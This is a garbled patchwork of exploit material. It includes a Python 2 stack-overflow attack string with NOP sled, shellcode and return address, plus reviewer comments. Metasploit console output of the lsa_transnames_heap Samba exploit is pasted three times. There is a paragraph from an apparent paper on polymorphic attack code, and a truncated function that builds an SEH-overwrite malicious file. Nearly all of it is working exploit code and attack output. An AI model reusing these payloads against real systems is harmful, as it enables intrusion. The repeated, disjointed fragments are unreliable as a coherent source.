"\xb3\x41\x55\xb1\xf3\xcd\xa6\x94\x05\x31\x71\xd1\x83\x43" +
"\xf4\x31\x48\xa1" )
#-----------------------attack string------------------------
# retFix | nopsled | payload, part 1 | ret | payload, part 2
#------------------------------------------------------------
# NOTE(review): the banner above names five pieces, but the code below only
# assembles nopsled + shellcode + ret; "retFix" and "payload, part 2" are not
# built here -- the banner may describe an older layout, confirm.
# Python 2 syntax (print statement): string literals are byte strings, so the
# "\x90" * n arithmetic below yields bytes, not text -- this would change
# meaning under Python 3.
print "[*] building attack string"
ret = "\x58\xFD\x9A\x00" # 0x009AFD58; taken
# NOTE(review): dead assignment -- `ret` is rebound to the identical value
# a few lines further down.
beforeRetSize = 268
# NOTE(review): beforeRetSize is never read; the sled length below hard-codes
# 268 instead of referencing it.
# Fixed 32-byte sequence (11 + 13 + 4 + 4 bytes). The second line contains the
# ASCII bytes 0x63 0x61 0x6C 0x63 ("calc"); a constant byte pattern like this
# is a straightforward static signature for detection.
shellcode = ("\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"
"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
"\xC7\x93\xC2\x77"
"\xFF\xD1\xEB\xF7")
# 0x90 (x86 NOP) repeated so that sled + shellcode totals exactly 268 bytes.
nopsled = "\x90" * (268 - len(shellcode))
ret = "\x58\xFD\x9A\x00"
# 268 bytes of sled + shellcode, then the 4-byte return address = 272 bytes,
# matching the trailing comment.
payload = nopsled + shellcode + ret # 272 bytes
msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
having a real polymorphic code, people always got confused with polymorphic
shellcode.
No, I am not writing another paper about polymorphic shellcode; there are
too many papers flying around since ADM created ADMutate, good papers about
nop sleds, jmp sleds, junk code insertion, etc. I am writing about real
polymorphic code: code that has a new appearance and a new fingerprint every
time it executes, making it almost unpredictable. And, yes, I will use some of
the previous techniques to move forward and step ahead, creating a real
polymorphic attack.
msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
def createMaliciousFile(filename):
seh_offset = 0x9c4
jumper = 0x06ad890d # pop pop ret ... CHANGE IT! (dll is rebased)
shellcode = '\x90' * 0x400 + '\xCC' # nopsled and int 3
content = '\x00\x00' # header record type
content += '\x1a\x00' # header length
content += '\x05\x10\x04\x00\x00\x00\x00\x00\x09\x00\x00\x01'
content += '\x01\x00\x30\x8d\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00'
>
> msf exploit(lsa_transnames_heap) > set TARGET 1
> TARGET => 1
> msf exploit(lsa_transnames_heap) > exploit
> [*] Started bind handler
> [*] Creating nop sled....
> ...
> [*] Trying to exploit Samba with address 0x08415000...
> [*] Connecting to the SMB service...
> [*] Binding to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...